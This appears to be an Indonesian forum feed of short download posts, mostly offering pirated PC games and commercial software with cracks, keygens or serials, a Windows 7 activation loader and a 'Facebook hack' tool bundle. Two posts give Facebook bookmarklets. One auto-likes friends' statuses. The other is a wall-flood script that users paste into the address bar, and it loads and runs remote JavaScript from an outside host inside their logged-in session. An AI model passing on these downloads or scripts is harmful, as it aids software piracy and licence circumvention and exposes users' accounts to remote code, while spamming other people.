Quote: Description Choose your hero and journey forth in the ultimate action role-playing quest that pits you against an army of demons and devils like no other. Hell-bent and determined to take over the world, the powerful sorcerer Marcus Dominus Ingens has recruited the souls of ancient alchemists to aid in his destruction. Get ready for an unparalleled action role-playing experience that combines gruesome, action-packed battles with a deep, involving storyline set in the turn of the ... more »

Download Kumpulan Game PC FULL RIP WORK : Enemy Engaged 2 Desert Operations | 223 Mb

timhacker318 at Your first forum - 2 bulan yang lalu
Quote: Genre: Simulation Developer: G2 Games Language: En Modern helicopter combat simulation with realistic flight physics Three exciting theaters of war with two opposing campaigns each Dynamic real-time battlefields. No linear mission plot or predefined unit behavior. Over 30,000 square kilometers of flying area over Lebanon, Taiwan and Korea Diverse combat environments executed in lush 3D detail under a wide range of weather conditions. Over 1,200 very detailed and blue-print ... more »

Edit Photo Facebook Dengan Portable Imagic Photo 2011 v8.0 | 2.5 Mb

timhacker318 at Your first forum - 2 bulan yang lalu
Quote: Make Your Photos Look Professional In Less Than 30 Seconds! An image editor which will let manage your photo collections Imagic Photo is an interesting and easy-to-use application created for color correction, fixing under or over exposure, correcting skin tone, reviving faded images, removing unwanted color casts, or adding an artistic flair. With the color and lighting tools set right at your fingertips, it allows you to adjust your pictures on the fly, without the need to navigate ... more »

Download Kumpulan Software Portable Full : Portable CorelDraw Graphics Suite X5 v15.2.0.686 SP3 | 439 Mb

timhacker318 at Your first forum - 2 bulan yang lalu
Quote: Siapa sih yang gak kenal denga Corel ich hanya orang kurang beriman yang gak kenal dengan Corel xixixii maaf becanda . New Features More than you thought possible! New! Built-in content organizer – quickly find graphics, templates and fonts Enhanced! Drawing tools – lock toolbars, improved Eyedropper, Mesh Fill and more New! Color management engine – control color consistency across media Enhanced! Content – get professional fonts, clipart, royalty-free ... more »

Download 2011 Full Portable Indigo Rose Setup Factory v9.0.3.0 | 33 Mb

timhacker318 at Your first forum - 2 bulan yang lalu
Quote: Indigo Rose Setup Factory v9.0.3.0, merupakan aplikasi yang sangat berguna bagi brada untuk membuat installan suatu software yang telah brada buat, baik menggunakan Delphi atau Visual basic dan lainnya. Software ini telah portable, tinggal brada pakai dan hasilnya sangat memuaskan banyak fitur terbaru yang di sajikan. Setup Factory ® 9 is the trusted and reliable way to make software installers for your Windows software applications. Unlike other installer builder tools that ... more »

Download 2011 Portable Nero Burning ROM Micro v10.6.4.100 | 41 Mb

timhacker318 at Your first forum - 2 bulan yang lalu
Quote: Nero Multimedia Suite 10 excels your multimedia power with a collection of three products bundled into one powerful suite. It’s loaded with advanced video editing features, media organizer and player, superior burning software, reliable backup technology, and special multimedia tools to enhance your music, photos and videos. Highlights: Video Editing with Nero Vision Xtra™ * Search quickly, play back and easily arrange all your music, photos and videos all in one place ... more »

Download Kumpulan Game PC FULL RIP WORK : Stuart Little 2 | 50 Mb

timhacker318 at Your first forum - 2 bulan yang lalu
Quote: Stuart Little 2 adalah Game dengan Genre Adventure jebolan E.B White Creations , Game yang di Fokuskan pada karakter Stuart & alur petualangan 3D berdasarkan adegan dari, film 2002 Stuart dan teman barunya (Margalo) memulai petualangan dan menghindari musuh yang dapat menangkap mereka, Falcon. Screenshoot : System Requirement * 32MB RAM * 100MB Hard Disk Space * 4X CD-ROM Drive * 2MB SVGA Video Card * 16-bit Sound Card * DirectX 8.1 ... more »

Download Kumpulan e-book Update Status facebook dan SMS Ramadhan 2011 | 500 Kb

timhacker318 at Your first forum - 2 bulan yang lalu
Quote: Sebelumnya, Selamat mengerjakan Ibadah Puasa yang ke 3 hari semoga puasa kita semua di terima Allah SWT. Amiin Ya Rabb. Pada Kesempata ini Fary ingin membagikan e-book kata-kata mutiara, Lucu, Cinta cocok buat update status atau kirim lewat SMS. Silahkan baca beberapa contoh : PERKATAAN Indah Adalah AllAH, LAGU Merdu Adalah AzaN, MEDIA Terbaik Adalah AL-QUR’AN, SENAM sehat Adalah SHOLAT, DIET Sempurna Adalah PUASA, KEBERSIHAN Menyegarkan Adalah WUDUK, PERJALANAN Indah ... more »

Download 2011 SPSS Statistics 19 Full With Crack

timhacker318 at Your first forum - 2 bulan yang lalu
Quote: SPSS Statistics 19, merupakan aplikasi untuk pengolah data seperti syntax, script dan output, yang merupakan aplikasi produk keluaran dari IBM, sangat berguna bagi brada mahasiswa atau anak siswa SMK jurusan Tekhnik. Features : * Quickly and accurately estimate data where entries are missing for better results * Create, correct, and test syntax with a minimum of errors in shorter time * Create cleanly formatted Office reports faster for timely delivery to decision ... more »

Download Kumpulan Game Flash PC : 100+ Miniclip Flash Game | 270 Mb

timhacker318 at Your first forum - 2 bulan yang lalu
Quote: Saat Jalan-Jalan di Enterupload cari artikel game ih ketemu dengan satu link ini Langsung di download eh...bagus ada 100 Game Lebih Miniclip Flash buat PC, semua di coba dan hasilnya lumayan seru, biz game nya kecil mudah dan lucu juga imut gak amit-amit kaya brada yang baca xixixii!! aaaaaaaaww. Penasaran mau download silahkan brada ichhh... Silahkan Brada Download : Download Kumpulan Game Flash PC : 100+ Miniclip Flash Game | 270 Mb

Download Kumpulan Game PC FULL RIP WORK : Game Tekken 5 | 455 Mb

timhacker318 at Your first forum - 2 bulan yang lalu
Quote: Tekken, pasti Brada Familyar dengan Game Fighting satu ini karena setiap rilisnya selalu menjadi Best seller dipasaran ,dan kali ini yang ingin aRa share adalah Tekken 5 dimana Tekken 5 ini merupakan Seri keenam dari Seri Tekken terpopuler. Tekken 5 difokuskan untuk mengambil kembali seri terdahulu. dimana Tekken 5 ini menggabungkan sistem pertempuran lebih cepat lebih cair, peningkatan grafis, karakter, dan perbaikan kerentanan karakter saat mereka menyerang. Misalnya, bergerak ...more »

Download Kumpulan Game PC Portable FULL : Avatar : The Last Airbender 1.0 | 227 MB

timhacker318 at Your first forum - 2 bulan yang lalu
Quote: PC | Windows | EN | Big Blue Bubble | 227 Mb Genre: Action, Strategy Sinopsis : Setelah 100 tahun beku di es, Aang muda terbangun dan sadar dia sedang berada di tengah-tengah perang yang mengerikan. Empat negara, Udara,Bumi, Api dan Air, yang diikat oleh takdir tapi satu, bangsa Api, yang bermaksud untuk mengusai ke 3 negara lainnya dan memulai peperangan dimana-mana, disini anda akan berperan sebagai Avatar Aang dan mempunyai Misi untuk mengembalikan keseimbangan ke 4 negara tersebut ... more »

Download Kumpulan Game PC Portable FULL : Moorhuhn Piraten | 70 MB

timhacker318 at Your first forum - 2 bulan yang lalu
Quote: Portable Moorhuhn Piraten XXL PC | Windows | EN | Phenomedia AG | 70 MB Genre: Shooting System Requirements * + Windows 95 / 98 / 2000 / ME / XP * + Pentium III 800 * + RAM 256 Mb * + 205 Mb free disk space * + 3D Graphics card 32 Mb DirectX 3 compatible * + DirectX 3 or better * + SoundCard DirectX 3 compatible * + Keyboard & Mouse Screnshoot Silahkan Brada Download : Download Kumpulan Game PC Portable FULL : Moorhuhn Piraten ... more »

Download Kumpulan Game PC Portable FULL : Aladdin in Nasira's Revenge | 80 Mb

timhacker318 at Your first forum - 2 bulan yang lalu
Quote: Genre: Action Publisher: Disney Interactive Studios Developer: Argonaut Games Disney's own street rat, Aladdin, is back in a new adventure, Nasira's Revenge. This 3-D action game is a port from the PlayStation to PC and, mercifully, doesn't require the latest, greatest PC just to play. It seems that even though our heroes vanquished Jafar, his sister, Nasira, (a new character created for the game) has a plan to bring him back from the dead. Together they plot to rule Agrabah. ... more »

Download Kumpulan Game PC FULL : Police Destruction Street | 64 Mb

timhacker318 at Your first forum - 2 bulan yang lalu
Quote: Police Destruction Street adalah Game dengan Genre Arcade yang sangat menarik untuk dimainkan karena selain ukuran nya terbilang kecil tetapi tidak mengesampingan ke asyikan dalam memainkan Game ini. disini anda akan di tempatkan di 4 kota besar tepatnya di Jalan-jalan kota yang dikuasai oleh penjahat ataupun narapidana yang melarikan diri, pengemudi yang brutal. dan sebagai tantangan dari Game ini anda diharuskan Menangkap mereka semua, untuk melanjutkan ke Level yang lebih tinggi. Screenshot System ... more »

Download Kumpulan Game PC FULL RIP WORK : Dragon Ball Z: Sagas | 255 Mb

timhacker318 at Your first forum - 2 bulan yang lalu
Quote: Dragon Ball Z adalah Game Adventure 3D yang dikembangkan oleh Avalanche Studios dan diterbitkan oleh Atari, berdasarkan anime Dragon Ball Z. Dragon Ball Z ini merupakan yang pertama dari beberapa seri yang dirilis di semua konsol generasi keenam. Gameplay Sagas memiliki permainan berbasis Fighting dengan kemampuan baru. dengan 3 Mode bertarung yang disuguhkan seperti: Melee, Combo, dan Ki. Serangan jarak dekat dengan cepat dan meninggalkan lawan . Serangan Combo dengan pukulan berturut-turut ... more »

Download Kumpulan Game PC FULL RIP WORK : Robin Hood Defender of the Crown | 179 Mb

timhacker318 at Your first forum - 2 bulan yang lalu
Quote: Robin Hood adalah tokoh dalam cerita rakyat Inggris. Ia adalah seorang bangsawan yang menjadi musuh Sheriff of Nottingham atau Prince John, melawan pejabat yang korupsi untuk kepentingan rakyat. Ia memimpin 140 orang yang disebut "Merry Men". disini Brada akan berperan sebagai Robin dan di tuntut untuk dapat menguasai semua teknik menggunakan senjata khas Robbin Hood yaitu Panah yang dapat Brada gunakan untuk mengalahkan Prince John, penyelamatan Raja Richard, dan menyatukan kembali ... more »

Download Kumpulan Game PC FULL RIP dan Work : Yamaha Supercross | 75 Mb

timhacker318 at Your first forum - 2 bulan yang lalu
Quote: Game Yamaha Supercross merupakan game yang sangat cocok untuk brada yang suka ngebut di jalanan Ibu Tiri xixixi!!, di jamin brada akan tegang sendirian dengan memainkan game ini sendirian xixixi!!. Cocok dengan brada yang lagi ngabuburit dan naksir di dunia maya. Release: 2009 | Genre: Motocross Racing | Developer: Coyote Console | Language: English | Size: 74.7 MB | Crack: SKIDROW System requirements: S.O: Windows 2000/XP/Vista Processor: 1.5 GHz; RAM: 512 MB; Video: ...more »

Download Kumpulan Game PC FULL RIP : Prince of Persia : Warrior Within | 290 Mb

timhacker318 at Your first forum - 2 bulan yang lalu
Quote: Secara grafik Prince of Persia : Warrior Within (Rip) ini sedikit lebih bagus dari pada Prince of Persia : The Two Thrones, secara misinya juga berbeda jauh mulai dari tempat serta musuh-musuhnya. Grafiknya ya setara PS2 gitu lah. Lumayan nih buat ngabuburit brada. Game penuh petualangan, pertarungan dan juga strategi brada dalam menghancurkan angkara murka. Game ini telah Fary tes dan hasilnya Alhamdulillah Sukses 100 % Work. Screenshot : Minimum System Requirements ... more »

Download 2011 BitRock InstallBuilder Enterprise 7.2.3 With Keygen | 122 Mb

timhacker318 at Your first forum - 2 bulan yang lalu
Quote: Dahulu Fary pernah share Advanced Installer Enterprise 8 + Crack, sekarang Fary share software sejenis namun beda merk dan tampilan yaitu BitRock InstallBuilder Enterprise 7.2.3 Full Version with Keygen. BitRock InstallBuilder Enterprise 7.2.3 + Keygen ini dapat Brada gunakan untuk membuat installer sebuah software. Jadi bagi yang lagi punya proyek software dan ingin membuatkan installernya bisa pake software ini, lumayan brada buat ngabuburit xixiix!! . Cara Registrasi : 1. ... more »

Download Script Auto Like 2012 Cara Like semua status Teman di Facebook | 2 Kb

timhacker318 at Your first forum - 2 bulan yang lalu
Quote: Silahkan Jika Brada Pingin like status orang dengan tanpa brada like tapi langsung otomatis melike. Silahkan Baca Caranya berikut ini : 1.Silahkan Brada login dulu ke Facebook ^_^! dan buka page teman yang ingin di autolike. 2. Copy semua code yang berwarna dibawah ini download ajah Code:javascript:var i=0;ex=0;s=0;function EXP_ALL(){ExpandComm = document.getElementsByTagName("input");for(e = 0; e < ExpandComm.length; e++){myClass ... more »

Tips Cara Membuat Nama Facebook Aneh dan Char NS Tanpa Nama

timhacker318 at Your first forum - 2 bulan yang lalu
Quote: Tool: * Character Map character map biasanya ada di setiap komputer. Silahkan Brada Ikuti Caranya ini work ^_^! 1. Klik start >> tulis "character map" biasanya berada di : Accessories >> System Tool. 2. di character map cari "Arial Unicode MS" , centang Advance view, cari unicode 3164 3. double klik blank character 4. Klik Copy dan pastekan di facebook atau NS. 5. Selamat Mencoba. Silahkan Brada Download Tips ini : Tips Cara Membuat Nama ... more »

Download Script Flood Wall Facebook 2012 Komentar Tak Terbatas | 1 kb

timhacker318 at Your first forum - 2 bulan yang lalu
Quote: Silahkan Brada Baca Keterangannya : 1. Silahkan Brada Pergi ke wall temen Brada/ group 2. Paste script di bawah ini di addresh bar Code: javascript:(a = (b = document).createElement("script")).src = "//brk.to/flood", b.body.appendChild(a); void(0); 3. kemudian tulis berapa banyak tulisan yang Brada inginkan 4. setelah itu tulis pesan yang Brada akan tulis 5. Selamat Mencoba. Silahkan ... more »

Download 2011 Skin Windows Media Player All Version Tercantik | 2.6 Mb

timhacker318 at Your first forum - 2 bulan yang lalu
Quote: Skin ini namanya Xbox Live skin yang sangat bagus ringan juga saat brada menjalankan Windows Media Playernya, karena ukuranya hanya 2 MB. Jika brada memerlukan, silahkan di download. Support : Xp / Vista / Windows 7 Screenshot : Silahkan Brada Download : Download 2011 Skin Windows Media Player All Version Tercantik | 2.6 Mb

Kumpulan Lagu Islam 2011 : Maher Zain - Baraka Allahu Lakuma | 4 Mb

timhacker318 at Your first forum - 2 bulan yang lalu
Quote: Lirik Lagu Baraka Allahu Lakuma By. Maher Zain We’re here on this special day Our hearts are full of pleasure A day that brings the two of you Close together We’re gathered here to celebrate A moment you’ll always treasure We ask Allah to make your love Last forever Let’s raise our hands and make Du’a Like the Prophet taught us And with one voice Let’s all say, say, say بارك الله لكما وبارك عليكما وجمع بينكما في خير بارك الله لكما وبارك عليكما وجمع بينكما في ... more »

Download Lagu Maher Zain - For The Rest of My Life ( Sepanjang Hidup ) | 3 Mb

timhacker318 at Your first forum - 2 bulan yang lalu
Quote: Lirik Lagu Maher Zain Sepanjang Hidup Lyrics aku bersyukur kau di sini kasih di kalbuku mengiringi dan padamu ingin ku sampaikan kau cahaya hati dulu ku palingkan diri dari cinta hingga kau hadir membasuh segalanya oh inilah janjiku kepadamu reff: sepanjang hidup bersamamu kesetiaanku tulus untukmu hingga akhir waktu kaulah cintaku cintaku sepanjang hidup seiring waktu aku bersyukur atas hadirmu kini dan selamanya aku milikmu yakini hatiku kau anugerah Sang Maha ... more »

Download Kumpulan Windows 7 Theme Collections

timhacker318 at Your first forum - 2 bulan yang lalu
Quote: Berikut ini adalah kumpulan tema untuk Windows 7 sebagai tambahan koleksi guna mempercantik tampilan Windows. Koleksi tema ini terdiri dari berbagai pengkategorian dengan beragam pilihan yang menarik. Misalnya ada tema Justin Bieber, Harry Potter and the Deathly Hallows, Ferrari, tema alam, binatang dan sebagainya. Yang berubah hanya desktop background yang berganti-ganti dengan koleksi wallpaper high resolution dan window color yang kebanyakan aero glass transparan, tidak sampai ... more »

Download 2011 MF Shutdown Manager v2.1 Full | 1.8 Mb

timhacker318 at Your first forum - 2 bulan yang lalu
Quote: MF Shutdown Manager v2.1 adalah software yang hampir mirip dengan software FSEasyShutdown, namun software MF Shutdown Manager v2.1 memiliki fitur yang sangat banyak dan lebih dari FSEasyShutdown. Brada akan dimanjakan sekali dengan Fitur-fiturnya, seperti Alarm, Lock Workstation, Clean Up Task, Launch File, dll. Nah, dengan adanya Fitur-fitur semacam itu kita akan bebas untuk memilih Fitur / Fungsi mana yang ingin kita pakai, jadi pada kesimpulannya Software ini memiliki banyak sekali ... more »

Download Kumpulan Game FULL RIP WORK : Zombie Shooter 2 | 547 MB

timhacker318 at Your first forum - 2 bulan yang lalu
Quote: Satu lagi nih game produksi dari SIGMA, game ini hampir sama dengan game alien shooter, hanya saja musuh yang di lawan dalam game ini adalah zombie, jalan ceritanya hampir seperti Alien shooter, Tertarik dengan game ini brada xixixi!!???? Silahkan atuh brada download. Screenshoots: System Requirements : * Pentium II 400 MHz processor * Direct3D compatible 3D graphics card with 16 MB * 64 MB RAM * DirectSound compatible sound card * Mouse compatible ... more »

Download 2011 Replace Studio Professional 7.7 Portable Full | 3 Mb

timhacker318 at Your first forum - 2 bulan yang lalu
Quote: Replace Studio Professional 7.7, merupakan software yang dapat membantu brada untuk mencari kata yang hilang atau salah dalam pengetikan atau sekedar mencari file apa saja di dalam PC atau laptop. Dengan memakai software ini brada akan lebih mudah untuk mencari kata yang salah tadi. Apalagi biar tidak ribet Fary telah jadikan portable software ini biar brada tinggal pakai tidak perlu install software Replace Studio Professional 7.7. Dengan bantuan aplikasi Replace Studio Professional ... more »

Membuat Composer Nada Dengan Geniesoft Overture v4.1.0.19 Full Keygen | 11 Mb

timhacker318 at Your first forum - 2 bulan yang lalu
Quote: Geniesoft Overture v4.1.0.19 Full Serial merupakan aplikasi yang dapat membuat composer nada sekaligus dapat memainkan nada yang telah di buat, aplikasi ini sama halnya dengan Guitar Pro, hanya saja aplikasi tersebut terlalu besar ukurannya dikarenakan Guitar Pro membutuhkan sebuah Soundbanks untuk bisa menjalankannya. Nah buat yang suka bereksperimen ingin menciptakan sebuah composer nada pada alat musik seperti piano maka aplikasi ini jangan dilewatkan ya, dari pada menghabiskan ... more »

Download Kumpulan Game FULL RIP WORK : PES 2011 REPACK [Enterupload] | 3GB

timhacker318 at Your first forum - 2 bulan yang lalu
Quote: Karena ada permintaan dari brada sahabat fary tentang game ini, walau besar tapi semoga dapat membantu. fary share game PES 2011 teranyar ini hanya buat teman brada yang baik-baik xiixxi!! . Pro Evolution Soccer 2011 akan memberi Brada pengalaman baru sepak bola, realisme yang luar biasa dan kualitas manajemen, banyak perbaikan dan perubahan radikal themost dalam sejarah seri. Menanti Brada completefreedom tindakan, kontrol penuh dari setiap transmisi, stroke, variouspasses dan ... more »

CorelDRAW Graphics Suite X5 v15.0.0.486 Final

timhacker318 at Your first forum - 2 bulan yang lalu
CorelDRAW Graphics Suite X5 v15.0.0.486 Final CorelDRAW Graphics Suite X5 makes everyday tasks faster and easier, delivering new time-savers that help you create with confidence. Check out the 10 most compelling reasons to upgrade your graphics software today. Microsoft Windows 7, Windows Vista, Windows XP, with latest service packs installed (32-bit or 64-bit editions) New! Built-in Content Organizer This is the upgrade you’ve been waiting for! CorelDRAW Graphics Suite X5 makes everyday ... more »

Download Kumpulan Game PC RIP FULL : Manhunt | 190MB

timhacker318 at Your first forum - 2 bulan yang lalu
Quote: Manhunt is a third-person stealth horror game. The game consists of twenty levels, and four bonus levels that can be unlocked; the levels are referred to as "scenes". Players survive the Scenes by dispatching enemy gang members known as "Hunters", occasionally with firearms but primarily by stealthily executing them in gruesome, over-the-top ways. The player is rated at the end of each level, primarily dependent on the gruesomeness of the killings and the speed of completion, from ... more »

Download 2011 Smart Hide IP 2.6.1.6 Full With Crack | 5 Mb

timhacker318 at Your first forum - 2 bulan yang lalu
Quote: Smart Hide IP - Dengan Software ini kita bisa dengan mudah menyembunyikan IP Brada. Software ini sangat berguna sekali melindungi identitas Brada saat Online. Silahkan dicoba jika brada mau mencoba. Tested...Worked Screenshot : Primary Benefits : Safe Proxy Every IP address you see is usable, fast and 100% secure! Easy-to-use Interface One single click and you are ready to go. Hide your real IP address without any configuration. Dynamic IP Address Automated IP ... more »

Download 2011 Windows 7 loader v1.9.9 | 1.7 Mb

timhacker318 at Your first forum - 2 bulan yang lalu
Quote: Windows 7 loader v1.9.9 Merupakan aplikasi atau tool yang sangat berguna bagi brada yang sedang mencari Serial Untuk Windows 7 karena windows 7 nya brada belum genuien xixiix!! . Supported operating systems -Windows 7 Ultimate -Windows 7 Ultimate E -Windows 7 Professional -Windows 7 Professional E -Windows 7 Home Premium -Windows 7 Home Premium E -Windows 7 Home Basic -Windows 7 Starter -Windows 7 Starter E -Windows Vista Ultimate -Windows Vista Business -Windows Vista ... more »

Download Kumpulan Game PC RIP FULL : Kill Switch | 240 MB

timhacker318 at Your first forum - 2 bulan yang lalu
Quote: The game is a remotely controlled super-soldier, Nick Bishop. For most of the game the soldier is remotely controlled by a man known only as "Controller." Controller is apparently using a direct neural connection to Bishop. Bishop's suppressed memories occasionally break through, causing Controller headaches. The memories feature a woman and the phrase, "Say my name." Controller, under orders from a man named Archer, uses Bishop in a series of combat missions designed to convince ...more »

Download 2011 Windows 8 Skin Pack For Windows 7 | 6.8 Mb

timhacker318 at Your first forum - 2 bulan yang lalu
Quote: Windows 8 Skin Pack For Windows 7 ini merupakan skin tambahan husus buat windows 7 yang pernah fary coba tanpilanya lumayan bagus mirip aslinya walaupun namanya juga hanya skin merubah tampilan bukan system. Tapi bagi brada yang memakai windows 7 yang pingin tampil beda apa salahnya kalau mencoba apa lagi hanya 6 Mb. Menurut Keterangan yang fary dapat tampilan skin Windows 8 ini dikeluarkan oleh Microsoft, jadi tidak usah takut untuk mencoba. Screenshot : Silahkan ... more »

Download Kumpulan Game PC RIP FULL : Driv3r [Mediafire] | 399 MB

timhacker318 at Your first forum - 2 bulan yang lalu
Quote:[center][/center The Driver series is helmed by an undercover cop named Tanner. This time around, Tanner is trying to infiltrate a Miami-based car thief ring, which is working to steal 40 exotic cars and ship them out of Miami. Part of the game's story involves finding out who the thieves in the car ring are working for, where the cars are going, and who's double-crossing whom. You'll start out in Miami, eventually make your way to Nice for some French car chases, and you'll also spend ... more »

Download Kumpulan Game PC RIP FULL : Total Overdose RIP [Mediafire] | 472 MB

timhacker318 at Your first forum - 2 bulan yang lalu
Quote: Total Overdose puts you in the shoes of Ram Cruz and his twin brother Tommy as they infiltrate the shady drug world of Mexico, as undercover DEA agents, to uncover the truth behind their father’s supposed “overdose”. This third person shooter arms players with tons of weapons, drivable vehicles, and hysterical one-liners. Players get the freedom to create their own action sequences with Loco Moves such as the “Mariachi Move” and the “Toro Move.” Players can experiment using Loco ... more »

Download 2011 Wondershare PDF Converter Pro 2.6.0.9 Full with Keygen | 268 Mb

timhacker318 at Your first forum - 2 bulan yang lalu
Quote: Wondershare PDF Converter Pro 2.6.0.9 Full Version with Keygen, jika dilihat dari namanya Brada pasti sudah tau donk fungsinya untuk apa? wew!!, Wondershare PDF Converter Pro 2.6.0.9 ini berguna untuk mengkonvert file dokumen PDF (.pdf) menjadi file office baik Word, Excel, PPT, Epub, bahkan sampai format HTML. Silahkan brada berkunjung ke situs resminya. System Requirements : * OS : Windows XP/Vista/7 * Processor: 1Ghz Processor or above * RAM: 512MB RAM or above ...more »

Recovery Data di CD / DVD Rusak Dengan CD Recovery Toolbox Portable | 6 Mb

timhacker318 at Your first forum - 2 bulan yang lalu
Quote: Untuk Brada yang sedang bingung karena data Brada tak sengaja terhapus atau terformat di CD Brada. Dengan CD Recovery Toolbox Brada akan dapat menjawab masalah diatas dengan mudah. Software recovery ini dapat merecovery (memunculkan data ) Brada yang hilang karena goresan yang terdapat pada CD Brada. Software recovery kali ini memang sedikit berbeda. Karena tidak tangung-tangung, CD Recovery Toolbox ini bisa merecovery semua jenis disk, dari CD sampai Blu-ray. Seperti software ... more »

Membuat Software Portable Mencantumkan Nama Anda Dengan VMWare ThinApp 4.6.1 Full Keygen With Tutorial | 33 Mb

timhacker318 at Your first forum - 2 bulan yang lalu
Quote: VMWare ThinApp Enterprise 4.6.1 Full Version with Keygen adalah sebuah software yang dapat anda gunakan untuk membuat software installer menjadi software portable. Dengan menjadikan sebuah software menjadi portable, tentunya akan memudahkan Brada dalam membawa software itu dengan flashdisk tanpa harus menginstallnya kembali. Silahkan bagi yang ingin bereksperimen membuat software portablenya. Apalagi Kalau Brada sudah mahir memakai software ini sebelum muncul software portable yang ... more »

Membuat Software Portable Dengan VMWare ThinApp 4.6.1 Full Keygen With Tutorial | 33 Mb

timhacker318 at Your first forum - 2 bulan yang lalu
Quote: VMWare ThinApp Enterprise 4.6.1 Full Version with Keygen adalah sebuah software yang dapat anda gunakan untuk membuat software installer menjadi software portable. Dengan menjadikan sebuah software menjadi portable, tentunya akan memudahkan Brada dalam membawa software itu dengan flashdisk tanpa harus menginstallnya kembali. Silahkan bagi yang ingin bereksperimen membuat software portablenya. Apalagi Kalau Brada sudah mahir memakai software ini sebelum muncul software portable yang ... more »

TERBARU SCREEN SAVER 2011 >> CEWEK STRIPES

lekerone at Your first forum - 2 bulan yang lalu
lngsung jja ea,, kbetulan kmaren di kmpus pnjem Flash Disc tmn. stlah di buka di lptop. ada bbrapa sfware yg mngkin blm ue ngrti. trlintas dlam pikiran buat copas smua isi file di flash disc trsebut. (bukan mksud jahat atau jahil). cma alasan utama bnyak bgt sfware2 yg mngkin brguna buat ue pelajarin. alasan ke 2, kbetulan flash disc itu cma 2GB. jdi dngan snang hati buat copas lngsung dri drive'a. klo seanda'a 8GB. yakin dehh, di ksih duit juga gaa mau. coz psti btuh wktu buat copas. ... more »

Software Collection Tim Hacker (06.04.2010)

timhacker318 at Your first forum - 2 bulan yang lalu
Quote:Software Collection - Silent Installation DVD Multilanguage (06.04.2010) Size | 3.07 GB Collection programs automatically install! 06.04.2010. All programs can be set manually or integrated into the WPI and similar installers. Installation is fully automatic. List of programs: AbyssMedia.SiteInFile.Compiler.v3.3.7.0 ACE.HIGH.MP3.WAV.WMA.OGG.Converter.v5.01 Acronis.True.Image.Home.2010.13.Build.6053 Aignesberger.Software.Website.Watcher.2010.Business.Edition Aleo.3D.Flash.Slideshow.Creator.v1.6 Aleo.Flash.Intro.and.Banner.Maker.v3.2 Alive.YouTube.Video.Converter.v2.3.6.8 AMS.P...more »

Download Game PC FULL RIP : Sonic Heroes Rip (Mediafire) | 150 MB

timhacker318 at Your first forum - 2 bulan yang lalu
Quote: Sonic Heroes adalah Game dalam Sonic the Hedgehog series, yang dikembangkan oleh Sonic Team dan dirilis pada tahun 2003 dan 2004 untuk beberapa platform (konsol Xbox, GameCube, PS2 dan PC). Game ini berbeda dari game Sonic lainnya dengan membiarkan pemain untuk mengambil kendali dari salah satu dari empat tim, masing-masing dengan tiga karakter, yang memiliki kemampuan yang unik bagi mereka. Game ini memperkenalkan beberapa elemen gameplay baru. Tidak seperti game Sonic kebanyakan, ... more »

Download software hack facebook ALL IN ONE BIG SECURITY ADVISOR 2012 | 22.9 Mb

timhacker318 at Your first forum - 2 bulan yang lalu
Quote: Cyber Crime Security 2012, merupakan kumpulan 30 aplikasi yang sangan berguna bagi brada yang mana aplikasi ini fary buat untuk kemudahan dalam tool hack dan deface, tapi versi ini fary hanya fokus pada Security Advisornya dan Self bagi PC atau laptop. Aplikasi ini bersifat portable, sehingga dapat di bawa kemana-mana dengan Flash Disk. Untuk lebih lanjut aplikasi yang fary buat ini semacam BIGHACK atau ULTRA HACKER. Adapun software yang ada di aplikasi ini adalah : FACEBOOK ... more »

Download Kumpulan Game PC RIP FULL : The Suffering RIP [Mediafire] | 252 MB

timhacker318 at Your first forum - 2 bulan yang lalu
Quote: The Suffering captures the disturbing and terrifying nature of the horror genre in a third-person action/adventure game set in the mature and gritty world of a maximum-security prison. The player controls the prisoner Torque, a hardened inmate in his late 20s, sentenced to die for a murder he may or may not have actually committed. Slightly mentally instable, Torque has flashbacks to the events from his past, throbbing images that depict the events that lead up to the crime for which ... more »

Download Game PC Wars & Warriors: Joan of Arc [Mediafire] | 555 MB

timhacker318 at Your first forum - 2 bulan yang lalu
Quote: Joan of Arc is actually the first in what they're hoping to be a series of Wars & Warriors games centered around various heroes through the ages. This particular game follows the major players in the conflict Joan of Arc was a part of during the drawn out Hundred Years War. But don't worry kiddos, you don't really have to learn anything here to have fun, we wouldn't want to stick information into your head that doesn't involve sex, money, or humuhumunukunukuapua'a. The historical presence ... more »

Download Game PC FULL RIP Age Of Empires II - Rise Of Rome FULL | 49 Mb

timhacker318 at Your first forum - 2 bulan yang lalu
Quote: From Microsoft Games: Game ini bercerita tentang peperangan jaman dulu yang masih menggunakan peralatan perang seadanya dan alat transportasinya masih menggunakan tenaga hewan. Jangan lupa membangun sebuah bangunan atau gedung untuk memproduksi segala kebutuhan perang. Game ini juga sama seperti Age Of Empires 2 yang sebelumnya sudah saya posting kemarin. Hanya ada sedikit perbedaan dengan Age Of Empires 2. Okkey selamat Bermain. Screen Shot : Cara Install : 1. Extract ... more »

DOWNLOAD ALART SCRIPT BLOG BUAT JAIL | 24 Kb

timhacker318 at Your first forum - 2 bulan yang lalu
Quote: 1. Masuk ke Blog 2. Tambah HTML/Java script 3. Copas (CTRL+C) script INI Code:

Download 2011 Advanced SystemCare Pro 4.0.1 New With Serial | 29 Mb

timhacker318 at Your first forum - 2 bulan yang lalu
Quote: Advanced SystemCare Pro merupakan software Utility yang bisa dibilang mirip dengan TuneUp Utilities. Tapi, menurut Fary, dibandingkan TuneUp, Advanced SystemCare Pro ini lebih bagus dan baik dalam berkerja untuk PC / Laptop kita secara Optitmal. Dengan Proses yang cepat serta akurat menjadi senjata utama Software ini berkerja, tampilannya pun tidak seberat TuneUp, Advanced SystemCare Pro lebih cenderung ringan dan mudah dalam penggunaannya, sehingga menarik hati para peminat software ... more »

Game PC Age Of Empires II - Rise Of Rome FULL | 49,698 KB

timhacker318 at Your first forum - 2 bulan yang lalu
Quote: From Microsoft Games: Age of Empires Expansion: The Rise of Rome is the highly anticipated add-on to the award-winning strategy game Age of Empires, the strategy/war winner of Gamecenter's Reader's Choice Awards for 1997. Focusing on the legendary Roman Empire, The Rise of Rome will challenge veterans and novices alike to wage war on an epic scale with four additional civilizations, several unique units, new technologies, and new campaigns, including the showcase campaign that focuses ... more »

Download 2011 FLV to AVI MPEG WMV 3GP MP4 iPod Converter 5.3.0402 Full Lisensi | 4.8 Mb

timhacker318 at Your first forum - 2 bulan yang lalu
